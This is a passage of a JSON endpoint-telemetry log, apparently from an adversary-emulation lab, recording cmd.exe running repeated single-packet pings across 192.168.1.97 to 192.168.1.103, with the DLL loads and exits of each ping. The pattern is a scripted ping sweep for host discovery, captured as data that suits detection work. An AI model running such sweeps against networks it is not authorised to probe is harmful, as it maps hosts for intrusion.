"process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572447140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4776, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572447140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" - }, - { - "event_type": "process", - "pid": 4776, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572451840000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.97", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4800, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572451990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572451990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572451990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": 
"C:\\Windows\\System32\\kernel32.dll", - "pid": 4800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572451990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572451990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572451990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572451990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572451990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572451990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4800, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572451990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572451990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572451990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" - }, - { - "event_type": "process", - "pid": 4800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572456990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.98", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2992, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572457130000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572457140000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": 
"C:\\Windows\\System32\\ntdll.dll", - "pid": 2992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572457140000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572457140000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572457140000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572457140000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572457140000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572457140000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2992, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572457140000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572457140000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572457140000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572457300000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" - }, - { - "event_type": "process", - "pid": 2992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572461990000, - "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.99", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2444, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572462140000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": 
"C:\\Windows\\System32\\PING.EXE", - "pid": 2444, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572462140000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2444, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572462140000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2444, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572462140000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2444, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572462140000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2444, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572462140000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2444, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572462140000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2444, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572462140000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2444, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572462140000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2444, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572462140000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2444, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572462140000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2444, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572462140000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" - }, - { - "event_type": "process", - "pid": 2444, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572466830000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.100", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3592, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 
131883572466980000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572466980000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572466980000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572466980000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572466980000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572466980000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572466980000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572466980000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572466980000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572466980000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572466980000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572466980000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" - }, - { - "event_type": "process", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572471990000, - "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.101", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 976, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572472130000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572472140000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572472140000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572472140000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572472140000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 
131883572472140000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572472140000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572472140000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572472140000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572472140000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572472140000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572472140000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" - }, - { - "event_type": "process", - "pid": 976, - 
"process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572476840000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.102", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5012, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572476980000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572476980000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572476980000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572476980000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572476980000, - "unique_pid": 
"{42FC7E13-CB7F-5C05-0000-00102E885201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572476980000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572476980000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572476980000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572476980000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572476980000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572476980000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": 
"C:\\Windows\\System32\\mswsock.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572476980000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" - }, - { - "event_type": "process", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572481830000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.103", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1976, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572481980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572481990000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572481990000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572481990000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" - }, - { 
- "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572481990000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572481990000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572481990000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1976, - 